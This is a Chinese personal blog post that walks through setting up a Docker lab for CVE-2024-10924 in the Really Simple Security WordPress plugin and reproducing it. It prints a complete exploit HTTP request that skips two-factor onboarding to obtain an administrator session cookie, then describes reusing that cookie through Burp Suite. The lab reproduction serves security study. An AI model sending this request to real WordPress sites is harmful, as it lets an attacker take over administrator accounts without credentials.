歌曲封面 未知作品

网站已运行 2 年 2 天 16 小时 50 分

Powered by Typecho & Sunny

5 online · 27 ms

小野博客 小野(Hirono)博客的个人网站,主要讲述关于小野的一些陈芝麻烂谷子事。网络、生活、我的主张,也是一个自留地
Title

影响4百万用户Wordpress的任意用户登录复现及环境(CVE-2024-10924)

小野

·

📟前端日记

·

Article

测试环境

环境地址 WordPress/CVE-2024-10924
(该裤已经删除)

安装教程

  1. 执行如下命令启动一个WordPress漏洞环境:
♾️ docker 代码:
docker compose up -d

访问 http://你的安装地址/wp-admin/install.php 进行WordPress安装。

  1. 安装完成之后使用创建的管理员账号登录。登录后访问 http://你的安装地址/wp-admin/plugins.php,点击“启用”激活Really Simple Security插件。(这里不能点“启动自动更新”,会升级成无漏洞版本)。

接着会跳出SSL激活选项,这里我们点击“Cancel”。

  1. 接着直接在当前页面点击“Settings”。
  2. "Login Protection" > "Two-Factor Authentication",接着如图顺序点击。
  3. 至此,CVE-2024-10924漏洞环境安装完成。

漏洞复现

  1. 正常访问后台登陆页面 http://你的地址/wp-login.php 发现处于未登录状态。
  2. 执行以下POC,其中user_id的值是你要登录的用户(一般管理员id是1)。
♾️ shell 代码:
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 89
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "12345678910",
    "redirect_to": "/wp-admin/"
}
  1. 执行结果会返回Cookie值,把这个cookie放到正常请求包里即可使用admin的身份登录后台。
  2. 但这里会发现一个问题:这个cookie必须在每次请求都手动添加,非常麻烦。于是我们可以使用burpsuite中的“Match and replace rules”设置来在每一次请求包中添加Cookie,实现在后台顺滑地进行操作。

结束

现在已有 49 次阅读,1 条评论,0 人点赞

广告

页底广告 页底广告
Comment:共1条
发表
  1. 头像
    @
    能不用插件就不插件~😊
    · Windows · 火狐浏览器 · 中国广东省联通
搜 索 消 息 足 迹
你还不曾留言过..
你还不曾留下足迹..
博主 网站设置有【CDN】缓存,留言等评论内容需要12小时才能显示! 不再显示
博主